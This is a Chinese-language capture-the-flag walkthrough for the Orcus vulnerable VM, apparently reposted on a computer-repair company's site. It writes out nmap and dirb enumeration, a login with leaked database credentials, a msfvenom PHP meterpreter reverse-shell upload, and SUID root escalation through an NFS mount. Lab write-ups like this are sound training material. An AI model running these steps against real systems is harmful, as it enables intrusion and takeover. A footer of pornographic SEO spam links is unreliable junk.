錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
挑戰關于Orcus VM的解題步驟

作者: 佚名  日期:2017-05-11 14:51:18   來源: 本站整理

 前言
各位朋友,今天我們將要挑戰的是由Mr. Viper為vulnerable hub設計的“ORCUS”奪旗挑戰賽。本次挑戰賽中包含了4部分:
獲取Shell
獲取root權限
獲取flag
自由發揮尋找隱藏flag
下載傳送門 SHA-256 : 79B1D93C60E664D70D8EB3C0CDF1AD98BF2B95036C84F87EEF065FA71C1AE51E
探索頻道
192.168.0.151是我們目前已知的目標IP,收集目標信息的第一步就需要進行枚舉,因此使用慣用手法使用nmap掃描其版本。 
nmap -p- -sV 192.168.0.151
從截圖中你可以看出目標開放了許多端口,但我們現在只需要關注80端口就好。 

得知目標開放80端口,因此我們通過瀏覽器打開目標IP 192.168.0.151,但是沒有收獲。 

為了不浪費寶貴時間,我選擇了另一款名為dirb的工具對目錄進行暴力破解。在終端鍵入如下命令: 
dirb http://192.168.0.151
ok大方向正確,并且我們挖出了許多目錄。特別是注意下面截圖中我高亮標注的backups目錄,接下來我們就看看該目錄有沒有驚喜。 

在瀏覽器中鍵入192.168.0.151/backups,其中我發現一個名為simple PHP Quiz-backup.tar.gz的tar文件。下載保存到本地,以供后面分析

解壓后發現其中包含php和html文件,我的小眼睛一瞄,名為db-conn.php的文件其中會不會有數據庫相關的東西呢? 

做了許多努力,最后發現dbuser,dbpasswords分別為數據庫的用戶名和密碼。 

在此之前我們就挖到很多目錄,如果你返回前面截圖還可以注意到phpmyadmin目錄。接著我們在瀏覽器中鍵入192.168.0.1.51/phpmyadmin,鍵入上一步獲得數據庫用戶名以及密碼 

正確輸入用戶名密碼,進入phpmyadmin管理頁面。其中發現名為zenphoto的數據庫,進去瞧瞧吧。 

在zenphoto數據庫中發現一個設置頁面可用于更新數據庫配置文件,在文本框區域填入我們的信息。 

此處,我們填入數據庫用戶名dbuser和數據庫密碼dbpassword,其他直接默認就好 

當點擊頁面下端的GO按鈕便開始安裝,在安裝完成之后會要求你設置管理員賬戶及密碼 

單擊繼續按鈕,同意給出服務條款

創建管理員用戶就不過多敘述,之后點擊頁面頂部的應用按鈕就好。

使用創建的管理員賬戶登錄zenphoto數據庫,進入管理控制臺之后我們可以選擇上傳圖片,但這里我們僅上傳zip文件 

鍵入以下命令,使用msfvenom生成惡意PHP腳本: 

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 –f raw
從截圖你可以看到生成的惡意PHP腳本,此刻我們需要復制高亮標注的部分代碼。之后將其粘貼到文本文檔,保存為shell.php。最后新建一個文件夾,將shell.php放入其中,然后將其進行壓縮。 最重要的是記得開啟metasploit中的multi handler 

回到瀏覽器以上傳我們的zip文件,之后探尋192.168.0.151/zenphoto/albums內的信息。從下面的截圖中可以看出我們成功上傳shell.php 

單擊shell.php,我們獲得metasploit內的meterpreter會話,鍵入以下命令獲取flag: 
Meterpreter >cd /var/www
Meterpreter >ls
Meterpreter >cat flag.txt
獲得第一個flag 

經過不懈努力,我在kippo文件夾中進一步發現許多信息 
Meterpreter >pwd
Meterpreter >cd ..
Meterpreter >cat etc/kippo/data/userdb.txt
獲得第二個flag 

接下來獲取root權限,在文本文檔中引用https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#suid-binary 中的內容。 之后將其另存為raj.c

上傳編譯好的raj.c文件獲取root權限,如下圖 
Meterpreter >upload/root/Desktop/raj.c
Meterpreter >shell
gcc -o raj raj.c

從nmap的掃描結果中我們知道目標ip的nfs端口已開放,利用這個點我們可以在Kali Linux中抓取其掛載的tmp數據 
mount -t nfs 192.168.0.151:/tmp mount
Chown root: root raj
Chmod u+s raj

./raj
Id
Cd /root
Cat flag.txt
獲得第三個flag

最后就靠你自由發揮找到其他flag咯
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 国产精品久久无码一区二区三区网| 无码国产亚洲日韩国精品视频一区二区三区 | 成人无码区免费A片视频WWW| 无码人妻精品中文字幕免费东京热 | AV无码小缝喷白浆在线观看| 亚洲AV中文无码乱人伦下载| 东京热av人妻无码| 亚洲AV无码精品蜜桃| AV无码精品一区二区三区宅噜噜 | 99无码精品二区在线视频| 免费A级毛片无码A| 无码粉嫩小泬无套在线观看| 亚洲一区无码中文字幕| 亚洲?v无码国产在丝袜线观看| 久久精品中文字幕无码绿巨人| 最新高清无码专区| 中文成人无码精品久久久不卡| 全免费a级毛片免费看无码| 久久无码高潮喷水| 日韩精品无码一区二区三区| 亚洲欧洲自拍拍偷午夜色无码| 无码任你躁久久久久久老妇| 免费看国产成年无码AV片| 中文无码热在线视频| 日韩免费无码一区二区三区| 亚洲av无码专区国产乱码在线观看| 亚洲精品97久久中文字幕无码| 免费无码精品黄AV电影| 久久美利坚合众国AV无码| 青青爽无码视频在线观看| 无码喷水一区二区浪潮AV| 免费无码一区二区三区蜜桃大| 无码熟妇人妻AV影音先锋| 日韩毛片免费无码无毒视频观看| 亚洲AV无码无限在线观看不卡| 亚洲中文字幕无码中文字| 无码AV大香线蕉| 成人无码午夜在线观看| 中文精品无码中文字幕无码专区| 大桥久未无码吹潮在线观看| 久久久久亚洲精品无码系列|